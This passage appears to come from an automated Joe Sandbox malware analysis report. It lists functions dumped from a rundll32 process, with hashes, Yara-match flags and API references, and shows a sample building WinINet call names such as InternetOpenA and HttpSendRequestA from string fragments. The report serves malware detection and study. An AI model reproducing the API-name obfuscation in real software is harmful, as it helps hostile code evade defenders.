                                                                                                            • Instruction ID: 429da4c788b4947de2b56927f3ff63c1ebdf555a14218068cb2c1a3caef3dce2
                                                                                                            • Opcode Fuzzy Hash: 05cbb0cd702e39e7cc81e2b939af7f08163b393ed286858609a456b257855990
                                                                                                            • Instruction Fuzzy Hash: CE90027131114402D11061599544716001597D1245F92C815A1815558D87D988917262
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 49c31c215f8c705f1e5d989c078236294631825e6e1db62c17ab10f0a28e14fd
                                                                                                            • Instruction ID: eb2594aa20344a10cfa6a92ad17b54c614ae1d598bffed88e1762db2365fbd23
                                                                                                            • Opcode Fuzzy Hash: 49c31c215f8c705f1e5d989c078236294631825e6e1db62c17ab10f0a28e14fd
                                                                                                            • Instruction Fuzzy Hash: 0490027160500802D15071595554756001597D0345F92C415A1015654D87998A5577E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 296e8d7c89319850c930d8ba53cdcd136d9ea5f32a89e7ba2860d20e20d3c462
                                                                                                            • Instruction ID: 4d31f010e6a8a5f3dbf4c3eab93b6c245068ff62e67de076e1378a493f42f890
                                                                                                            • Opcode Fuzzy Hash: 296e8d7c89319850c930d8ba53cdcd136d9ea5f32a89e7ba2860d20e20d3c462
                                                                                                            • Instruction Fuzzy Hash: 1C90027120504842D14071595544A56002597D0349F92C415A1055694D97698D55B7A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 528bb9c1a0ed40c2ccdae324f5a2851508bd4d6f2a86e3a22dfec07ee18b1091
                                                                                                            • Instruction ID: 0dd16644ef4da798e3480b73a5b8c78116afa98db133fb87e406a05f19f8d4f1
                                                                                                            • Opcode Fuzzy Hash: 528bb9c1a0ed40c2ccdae324f5a2851508bd4d6f2a86e3a22dfec07ee18b1091
                                                                                                            • Instruction Fuzzy Hash: FB90027120100802D1807159554465A001597D1345FD2C419A1016654DCB598A5977E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: a73c05bad136c25860d99269498e5e6ba8bccb395de743c4a3c73ea835a6237a
                                                                                                            • Instruction ID: fa4d83bc07fa599347b400c479338161028903c7eb420999f11c441dbd6d6e9c
                                                                                                            • Opcode Fuzzy Hash: a73c05bad136c25860d99269498e5e6ba8bccb395de743c4a3c73ea835a6237a
                                                                                                            • Instruction Fuzzy Hash: 5490027120100842D10061595544B56001597E0345F92C41AA1115654D8759C8517661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: b110f900228ef7bd994a07916b917d9f5ef7c2f55987765d05fc270f34561aa0
                                                                                                            • Instruction ID: 34ccbb1358389555f660ca23032afd2b8173337eedbfd86deeb22639f5299de1
                                                                                                            • Opcode Fuzzy Hash: b110f900228ef7bd994a07916b917d9f5ef7c2f55987765d05fc270f34561aa0
                                                                                                            • Instruction Fuzzy Hash: 3890027120108802D1106159954475A001597D0345F96C815A5415658D87D988917261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 26206db77c36b3acaf51cfa89d8cfb051b5a95b481f382085b527ba98e385691
                                                                                                            • Instruction ID: a3c0ebd793e7fbe7ae0fda869a0a5ca3db1d87976e8b96ddcf958b06ed7407a0
                                                                                                            • Opcode Fuzzy Hash: 26206db77c36b3acaf51cfa89d8cfb051b5a95b481f382085b527ba98e385691
                                                                                                            • Instruction Fuzzy Hash: B59002B120100402D14071595544756001597D0345F92C415A6055554E879D8DD577A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 62548ff7675a57cbf296d423e544ebe4588efb4fe3f637250d08320be61697d1
                                                                                                            • Instruction ID: 0df5a24e1fa521a24ea7688b141f3f8c83fffa747a31ab2de2f2af0350d3cad4
                                                                                                            • Opcode Fuzzy Hash: 62548ff7675a57cbf296d423e544ebe4588efb4fe3f637250d08320be61697d1
                                                                                                            • Instruction Fuzzy Hash: 929002A134100442D10061595554B160015D7E1345F92C419E2055554D875DCC527266
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 4c5908146ec4403a0d839c077d3f7010c4226db59413a8539679e207cdbac09b
                                                                                                            • Instruction ID: 290405a5c092fb9fa79de39fbbeb8e903bc046256f5845b0c6042538637b97ba
                                                                                                            • Opcode Fuzzy Hash: 4c5908146ec4403a0d839c077d3f7010c4226db59413a8539679e207cdbac09b
                                                                                                            • Instruction Fuzzy Hash: C9900261242041525545B15955445174016A7E02857D2C416A2405950C866A9856F761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: bcac4e7f89410fdcd3ef3c1b5473458bcb2ef5322581ce844f9d1521d210b5c9
                                                                                                            • Instruction ID: 8515e88998b64f01ad881fde3cb21b1455a6f5fe5b712b125662df16da3aaf8c
                                                                                                            • Opcode Fuzzy Hash: bcac4e7f89410fdcd3ef3c1b5473458bcb2ef5322581ce844f9d1521d210b5c9
                                                                                                            • Instruction Fuzzy Hash: EA90027120100413D11161595644717001997D0285FD2C816A1415558D979A8952B261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 401abc7a870221878776bc71de6a8f7c1d4fe7ad103e49aee724e0d4c9a7579d
                                                                                                            • Instruction ID: f96c16adaefb6111240d42adb396d72db77b403aca6ad1391a4da67210afce60
                                                                                                            • Opcode Fuzzy Hash: 401abc7a870221878776bc71de6a8f7c1d4fe7ad103e49aee724e0d4c9a7579d
                                                                                                            • Instruction Fuzzy Hash: 4990026124100802D140715995547170016D7D0645F92C415A1015554D875A896577F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: e796810935caf869b1f8aec4d9d9ec9d60cef2a3a45ed573c529553698ecbee2
                                                                                                            • Instruction ID: db495cd8dcda8f1cc4153bfb969c6331a8637aaf2f5e37a5bdd0ca1780a6c241
                                                                                                            • Opcode Fuzzy Hash: e796810935caf869b1f8aec4d9d9ec9d60cef2a3a45ed573c529553698ecbee2
                                                                                                            • Instruction Fuzzy Hash: 5390026121180042D20065695D54B17001597D0347F92C519A1145554CCA5988617661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F3ECC0 Relevance: 33.6, APIs: 1, Strings: 18, Instructions: 312COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3EE72
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID: $D$P$\$\$\$a$a$a$a$e$i$l$m$n$o$s$t
                                                                                                            • API String ID: 3188754299-3665197332
                                                                                                            • Opcode ID: ae4734fd11fc81c787705a850ad38bad60c09ed205de5a7d84f66637d75df19c
                                                                                                            • Instruction ID: ee515da6e374f595b143b254e03775e166e1489701d717a232aba7c665abdd0c
                                                                                                            • Opcode Fuzzy Hash: ae4734fd11fc81c787705a850ad38bad60c09ed205de5a7d84f66637d75df19c
                                                                                                            • Instruction Fuzzy Hash: 49C17FB5900308AFEB14DFA4CC85FEAB7B8BF48704F04855DE619AB241EB74AA44CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F3ECBF Relevance: 33.6, APIs: 1, Strings: 18, Instructions: 310COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3EE72
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID: $D$P$\$\$\$a$a$a$a$e$i$l$m$n$o$s$t
                                                                                                            • API String ID: 3188754299-3665197332
                                                                                                            • Opcode ID: fa865690fdccfbaca9703a5320d0d5265ebec506eca00ac99653fc5fc78fd1c5
                                                                                                            • Instruction ID: 235cf93bb631c868d942464d1904d3f40abb0ef89a60db7883acd3dc00feabd2
                                                                                                            • Opcode Fuzzy Hash: fa865690fdccfbaca9703a5320d0d5265ebec506eca00ac99653fc5fc78fd1c5
                                                                                                            • Instruction Fuzzy Hash: 5BC17FB5900308AFDB14DFA4CC85FEAB7B9BF48704F04855DE619AB241EB75AA44CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A9A5 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 127networkCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 399 f4a9a5-f4a9a6 400 f4a963-f4a964 399->400 401 f4a9a8-f4a9d1 399->401 403 f4a9d4 400->403 404 f4a966 400->404 402 f4a9d3 401->402 402->403 405 f4aa44-f4aa76 call f4b080 402->405 403->405 406 f4a9d6 403->406 407 f4a930-f4a937 404->407 408 f4a969-f4a96c 404->408 420 f4aa9f-f4aaa5 405->420 421 f4aa78-f4aa9e 405->421 409 f4a9a0-f4a9a4 406->409 410 f4a9d8-f4a9e6 406->410 408->402 412 f4a96e-f4a981 call f4b080 408->412 413 f4a9ef-f4a9f6 410->413 414 f4a9ea call f4b080 410->414 423 f4a983-f4a99d InternetOpenA 412->423 424 f4a99e 412->424 418 f4aa1f-f4aa25 413->418 419 f4a9f8-f4aa1e InternetConnectA 413->419 414->413 424->409
                                                                                                            APIs
                                                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00F4A997
                                                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00F4AA18
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Internet$ConnectOpen
                                                                                                            • String ID: A$Conn$ConnectA$Http$HttpOpenRequestA$Inte$InternetConnectA$InternetOpenA$Open$OpenRequestA$Requ$RequestA$ectA$estA$rnet$rnetConnectA$rnetOpenA
                                                                                                            • API String ID: 2790792615-2564058935
                                                                                                            • Opcode ID: 501f1d366552ff36428ac431049710503fc10a6352b639ea7f741bff8408a1bd
                                                                                                            • Instruction ID: df45d4d0ce3378bf7b75501294c3ff18683343a11c1699c8cca5d8536a86e5c3
                                                                                                            • Opcode Fuzzy Hash: 501f1d366552ff36428ac431049710503fc10a6352b639ea7f741bff8408a1bd
                                                                                                            • Instruction Fuzzy Hash: DF417DB2905109AFCB14DF98D9419EF7BB9EF48310F158289FD58A7301D6359E10DBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4AAA8 Relevance: 29.8, APIs: 1, Strings: 16, Instructions: 73networkCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 426 f4aaa8-f4aaad 427 f4ab21-f4ab66 call f4b080 426->427 428 f4aaaf 426->428 435 f4ab7f-f4ab85 427->435 436 f4ab68-f4ab7e 427->436 430 f4ab06-f4ab12 HttpSendRequestA 428->430 431 f4aab1-f4aae6 428->431 433 f4aaef-f4aaf6 431->433 434 f4aaea call f4b080 431->434 437 f4ab13-f4ab19 433->437 438 f4aaf8-f4ab05 433->438 434->433 438->430
                                                                                                            APIs
                                                                                                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00F4AB0C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HttpRequestSend
                                                                                                            • String ID: File$File$Http$HttpSendRequestA$HttpSendRequestA$Inte$InternetReadFile$Read$ReadFile$Requ$RequestA$Send$SendRequestA$estA$rnet$rnetReadFile
                                                                                                            • API String ID: 360639707-998580104
                                                                                                            • Opcode ID: 0e89a1f39947a4da2a28fe078855be92eb982ef32a0c8e1503e91eb44bc0fe94
                                                                                                            • Instruction ID: c682f7c447f12f6a2b74ab49aa1c8354ea2b669ef846ead33558978a8fec959d
                                                                                                            • Opcode Fuzzy Hash: 0e89a1f39947a4da2a28fe078855be92eb982ef32a0c8e1503e91eb44bc0fe94
                                                                                                            • Instruction Fuzzy Hash: 85214CB2905118AFCB10DF98C945AEF7BB8EF54310F148188FD586B205D270EE10CBE2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4AAB0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00F4AB0C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HttpRequestSend
                                                                                                            • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                            • API String ID: 360639707-2503632690
                                                                                                            • Opcode ID: 181eb94e895dc51056676b2eac543638f6304b35abf11ead0259771972cf651e
                                                                                                            • Instruction ID: e81c093aec446894ef545ed7083c9a0868f360bb63b42975045f32304b5ae105
                                                                                                            • Opcode Fuzzy Hash: 181eb94e895dc51056676b2eac543638f6304b35abf11ead0259771972cf651e
                                                                                                            • Instruction Fuzzy Hash: 0C014FB2905118AFCB10DF98D841AEF7BB8EB44210F108189FD18A7205D670EE10CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A9B0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00F4AA18
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConnectInternet
                                                                                                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                            • API String ID: 3050416762-1024195942
                                                                                                            • Opcode ID: 8013f01dc930006bc7a4d3152c9710359a2c45cb0cbd4e2268df3eef628b7ed5
                                                                                                            • Instruction ID: e83b489085936c75ede0421a3932850c446ee79e84eaf3f04589313d2d212d1c
                                                                                                            • Opcode Fuzzy Hash: 8013f01dc930006bc7a4d3152c9710359a2c45cb0cbd4e2268df3eef628b7ed5
                                                                                                            • Instruction Fuzzy Hash: 8801E9B2905118AFCB14DF99D941EEF7BB8EB48310F158289FE08A7241D630EE10CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A940 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00F4A997
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InternetOpen
                                                                                                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                            • API String ID: 2038078732-3155091674
                                                                                                            • Opcode ID: ce1226a5f590db258fc1bfef50b6f00536ef00752c7dd342676d54e17e58f98c
                                                                                                            • Instruction ID: fd329469111fe6dd62aae5f15c51a99afb4ad6d27fb458bbf863ea319ca5ee06
                                                                                                            • Opcode Fuzzy Hash: ce1226a5f590db258fc1bfef50b6f00536ef00752c7dd342676d54e17e58f98c
                                                                                                            • Instruction Fuzzy Hash: C0F019B2901219AF8B14DF98DC419EBBBBCEF48310B048589FE58A7301D635AE108BE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4AB90 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00F4ABDF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInternet
                                                                                                            • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                            • API String ID: 1081599783-4067651292
                                                                                                            • Opcode ID: 7af09c8b05adef67a2c87ef62728ed417f880468c82a324ff43576072957f734
                                                                                                            • Instruction ID: 366f2f230941901c5ad3731ac4767f24ecde3925c9e84d65ef6d064f279cc2e2
                                                                                                            • Opcode Fuzzy Hash: 7af09c8b05adef67a2c87ef62728ed417f880468c82a324ff43576072957f734
                                                                                                            • Instruction Fuzzy Hash: 11F030B2D05118AF8B10DFD9D9459EFBBB8EB44310F108189ED486B201E6719B10CBE2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4AB86 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 31networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00F4ABDF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleInternet
                                                                                                            • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                            • API String ID: 1081599783-4067651292
                                                                                                            • Opcode ID: d577a63596af2fe68104445f768df5703fe8ce08e7115348a0f4aa66b2d6dfa8
                                                                                                            • Instruction ID: 327946b30c81e1bbc46fb00caac39594f9cc6f72a5444ccd65bdac59914bdaed
                                                                                                            • Opcode Fuzzy Hash: d577a63596af2fe68104445f768df5703fe8ce08e7115348a0f4aa66b2d6dfa8
                                                                                                            • Instruction Fuzzy Hash: 72F012B1C051189F8B14DFA9D9459EE7F74EB44310F118189E9456B205D3709B00CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

